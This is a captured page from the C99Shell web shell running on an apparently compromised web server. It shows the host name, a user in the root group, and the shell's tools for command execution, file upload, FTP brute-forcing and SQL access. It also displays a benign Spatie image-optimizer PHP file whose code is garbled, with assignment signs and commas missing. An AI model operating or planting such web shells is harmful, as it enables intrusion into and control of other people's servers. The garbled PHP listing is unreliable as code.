!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/vendor/spatie/image-optimizer/src/Optimizers/   drwxr-xr-x
Free 23.76 GB of 117.98 GB (20.14%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Avifenc.php (1.3 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Spatie\ImageOptimizer\Optimizers;

use 
Spatie\ImageOptimizer\Image;

class 
Avifenc extends BaseOptimizer
{
    public 
$binaryName 'avifenc';
    public 
$decodeBinaryName 'avifdec';

    public function 
canHandle(Image $image): bool
    
{
        if (
version_compare(PHP_VERSION'8.1.0''<')) {
            return 
$image->extension() === 'avif';
        }

        return 
$image->mime() === 'image/avif';
    }

    public function 
getCommand(): string
    
{
        return 
$this->getDecodeCommand().' && '
            
.$this->getEncodeCommand();
    }

    protected function 
getDecodeCommand()
    {
        
$this->tmpPath tempnam(sys_get_temp_dir(), 'avifdec').'.png';

        
$optionString implode(' ', [
            
'-j all',
            
'--ignore-icc',
            
'--no-strict',
            
'--png-compress 0',
        ]);

        return 
"\"{$this->binaryPath}{$this->decodeBinaryName}\" {$optionString}"
            
.' '.escapeshellarg($this->imagePath)
            .
' '.escapeshellarg($this->tmpPath);
    }

    protected function 
getEncodeCommand()
    {
        
$optionString implode(' '$this->options);

        return 
"\"{$this->binaryPath}{$this->binaryName}\" {$optionString}"
            
.' '.escapeshellarg($this->tmpPath)
            .
' '.escapeshellarg($this->imagePath);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--